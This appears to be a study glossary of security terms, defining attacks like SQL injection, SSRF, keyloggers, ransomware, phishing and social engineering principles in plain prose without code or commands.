A software vulnerability that can occur when a Windows-based application attempts to force another running application to load a dynamic-link library (DLL) in memory, causing the victim application to experience instability (crashes) or leak sensitive information. To mitigate, all calls to different DLLs should be hard-coded in the application.
Spyware
A special class of adware that collects data about the user and transmits it over the Internet without the user's knowledge or permission
Phishing
A technique to gain personal information for the purpose of identity theft, usually by means of fraudulent e-mail
Eliciting Information
A technique used to gather information without targets realizing they are providing it
Offline Brute Force Attack
A type of attack in which the attacker attempts to guess all possible character combinations from captured packet scans or databases and attempts to crack the password offline.
Structured Query Language (SQL) injection
A type of attack in which the hacker adds SQL code to a Web or application input to gain access to or alter data in the database.
Online Brute Force Attack
A type of attack that attempts to guess all possible character combinations from an online system; can be thwarted by setting account lock-out on the application.
Keyloggers
A type of attack that records keystrokes to provide cybercriminals with confidential data
Extensible Markup Language (XML) injection
A type of code injection attack in which the attacker attempts to embed code in XML documents.
Lightweight Directory Access Protocol (LDAP) injection
A type of code injection attack in which the attacker embeds commands in text being sent as part of a LDAP query
Collision attack
A type of cryptographic attack; an attempt to find two input strings of a hash function that produce the same hash result.
Replay Attack
A type of network attack where an attacker captures network traffic and stores it for retransmission at a later time to gain unauthorized access to a network.
Example of a TOC/TOU scenario
An OS builds a comprehensive list of access permissions for a user upon logon and then consults that list throughout the logon session
Request forgeries
An attack that forces authenticated users to submit a request to a Web application against which they are currently authenticated.
Buffer Overflow Attack
An attack that occurs when a process attempts to store data in RAM beyond the boundaries of a fixed-length storage buffer.
Bluejacking
An attack that sends unsolicited messages to Bluetooth-enabled devices.
Directory Traversal
An attack that takes advantage of a vulnerability so that a user can move from the root directory to restricted directories.
Server-Side Request Forgery (SSRF)
An attack that tricks a server into visiting a URL based on user-supplied input; these attacks are possible when a web application accepts URLs from a user as inpout and then retrieves information from that URL.
Spraying attack
An attack that uses naming conventions to guess passwords or sensitive information.
Logic bombs
An instruction in a computer program that triggers a malicious act
Memory leak
An undesirable state in which a program requests memory but never releases it, which can eventually prevent other programs from running.
Session Replay Attack
Attacker listens to the conversation between the user and the server and captures the authentication token of the user
API attacks
Attacks on an API. API attacks attempt to discover and exploit vulnerabilities in APIs.
Cloud-based attacks
Attacks that occur in cloud-based services; for these attacks, you are likely operating in what may potentially be a more secure datacenter, and once in which it would be far harder to figure out which systems your operations are running.
On-premise attacks
Attacks that occur on systems that reside on premise; these attacks give you the ability to audit access to the facility or to check on what occurred to a specific physical machine, since it's on location.
Shoulder surfing
Gaining compromising information through observation (as in looking over someone's shoulder).
Error handling
Coding methods to anticipate and deal with exceptions thrown during execution of a process.
Tainted training data for machine learning (ML)
Data that confuses the artificial intelligence (AI) machine during the training process; attackers send modified training data that causes the AI to behave incorrectly and ineffectively.
Malicious universal serial bus (USB) cable
Engineered USB cables that carry malware; they're less common since they require dedicated engineering to build, rather than simply buying commodity flash drives
Pretexting
Occurs when someone improperly accesses your personal information by posing as someone who needs data for one reason or another
Principle of intimidation
Principle (of social engineering) that relies on scaring or bullying an individual into taking a desired action; the individual who is targeted will feel threatened and respond by doing what the social engineer wants them to do
Principle of Familiarity
Principle (of social engineering) that rely on the victim liking the individual or even the organization the individual is claiming to represent, thus thinking everything is "normal."
Principle of Consensus
Principle (of social engineering) that uses the fact that people tend to want to do what others are doing to persuafe them to take an action
Principle of Authority
Principle (of social engineering) that we are more likely to agree to a request made by an authority figure
Bots
Remotely controlled systems or devices that have a malware infection; groups of bots are known as botnets.
Credential harvesting
Social engineering techniques for gathering valid credentials to use to gain unauthorized access.
Backdoor
Software code that gives access to a program or a service that circumvents normal security protections.
Improper input handling
Software that allows the user to enter data but does not validate or filter user input to prevent a malicious action.
Ransomware
Software that encrypts programs and data until a ransom is paid to remove it.
Fileless virus
Software that uses legitimate programs to infect a computer. It does not rely on files and leaves no footprint, making it challenging to detect and remove.
Invoice scams
The act of using a fake invoice in an attempt to get a company to pay for things it has not ordered
Hybrid Warfare
a new term used to describe a strategy that deliberately mixes elements and techniques of conventional warfare (e.g., national uniforms, heavy weapons) and unconventional warfare (e.g., guerrilla, paramilitary, information, or cyber war) as a way to coerce adversaries while avoiding attribution and retribution
